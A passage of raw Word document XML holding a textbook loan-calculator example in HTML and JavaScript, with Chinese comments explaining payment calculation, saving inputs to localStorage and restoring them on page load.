        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Approximate Payments:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/t</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="calculate();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Calculate</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Monthly payment:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span class="output"id="payment"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Total payment:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span class="output"id="total"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Total interes</w:t>
      </w:r>
      <w:r>
        <w:t>t:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span class="output"id="totalinterest"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Sponsors:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/th</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td colspan=2</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Apply for your loan with one of these fine lenders:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id="lenders"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>随后是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScirpt</w:t>
      </w:r>
      <w:r>
        <w:t>代码，这些代码内嵌在了一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签里</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>通常情况</w:t>
      </w:r>
      <w:r>
        <w:t>下，这些脚本代码应当放在＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码放在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码之后仅仅是为了便于理解</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"use strict";//</w:t>
      </w:r>
      <w:r>
        <w:t>如果浏览器支持的话，则开启</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这里的脚本定义了</w:t>
      </w:r>
      <w:r>
        <w:t>caculate()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码中绑定事件处理程序时会调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数从＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中读取数据，计算贷款赔付信息，并将结果显示在＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>同样，这里还保存了用户数据、展示了放贷人链接并绘制出了图表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>calculate(){//</w:t>
      </w:r>
      <w:r>
        <w:t>查找文档中用于输入输出的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var amount=document.getElementById("amount");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var apr=document.getElementById("apr");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var years=document.getElementById("years");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var zipcode=document.getElementById("zipcode");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var payment=document.getElementById("payment");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=document.getElementById("total");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var totalinterest=document.getElementById("totalinterest");//</w:t>
      </w:r>
      <w:r>
        <w:t>假设所有的输入都是合法的，将从</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中获取输入数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将百分比格式转换为小数格式，并从年利率转换为月利率</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将年度赔付转换为月度赔付</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var principal=parseFloat(amount.value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var interest=parseFloat(apr.value)/100</w:t>
      </w:r>
      <w:r>
        <w:t>/12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var payments=parseFloat(years.value)*12;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在计算月度赔付的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=Math.pow(1+interest,payments);//Math.pow()</w:t>
      </w:r>
      <w:r>
        <w:t>进行幂次运算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var monthly=(principal*x*interest)/(x-1);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果结果没有超过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>能表示的数字范围，且用户的输入也正确</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里所展示的结果就是合法的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isFinite(monthly)){//</w:t>
      </w:r>
      <w:r>
        <w:t>将数据填充至输出字段的位置，四舍五入到小数点</w:t>
      </w:r>
      <w:r>
        <w:t>后两位数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>payment.innerHTML=monthly.toFixed(2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total.innerHTML=(monthly*payments).toFixed(2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>totalinterest.innerHTML=((monthly*payments)-principal).toFixed(2);//</w:t>
      </w:r>
      <w:r>
        <w:t>将用户的输入数据保存下来，这样在下次访问时也能取到数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>save(amount.value,apr.value,years.value,zipcode.value);//</w:t>
      </w:r>
      <w:r>
        <w:t>找到并展示本地放贷人，但</w:t>
      </w:r>
      <w:r>
        <w:t>忽略网络错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>捕获这段代码抛出的所有异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>getLenders(amount.value,apr.value,years.value,zipcode.value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){/*</w:t>
      </w:r>
      <w:r>
        <w:t>忽略这些异常</w:t>
      </w:r>
      <w:r>
        <w:t>*/}//</w:t>
      </w:r>
      <w:r>
        <w:t>最后，用图表展示贷款余额、利息和资产收益</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart(principal,interest,monthly,payments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果不是数字或者是无穷大，意味着输入数据是非法或不完整的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>清空之前的输出数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>payment.innerHTML="";//</w:t>
      </w:r>
      <w:r>
        <w:t>清空元</w:t>
      </w:r>
      <w:r>
        <w:t>素的文本内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total.innerHTML=""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>totalinterest.innerHTML="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chart();//</w:t>
      </w:r>
      <w:r>
        <w:t>不传参数的话就是清除图表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将用户的输入保存至</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些属性在再次访问时还会继续保持在原位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果你在浏览器中按照</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>的方式直接打开本地文件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>则无法在某些浏览器中使用存储功能（比如</w:t>
      </w:r>
      <w:r>
        <w:t>FireFox</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>而通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>打开文件是可行的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>save(amount,apr,years,zipcode){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.localStorage){//</w:t>
      </w:r>
      <w:r>
        <w:t>只有在浏览器支持的时候才运行这里的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.loan_amount=amount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.loan_apr=apr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.loan_years=years;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>localStorage.loan_zipcode=zipcode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在文档首次加载时，将会尝试还原输入字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>如果浏览器支持本地存储并且上次保存的值是存在的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage.loan_amount){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("amount").value=localStorage.loan_amount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("apr").value=localStorage.loan_apr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("years").value=localStorage.loan_years;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("zipcode").value=localStorage.loan_zipcode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>将用户的输入发送至服务器端脚本（理论上）将</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个本地放贷人的链接列表，在这个例子中并没有实现这种查找放贷人的服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但如果该服务存在，该函数会使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
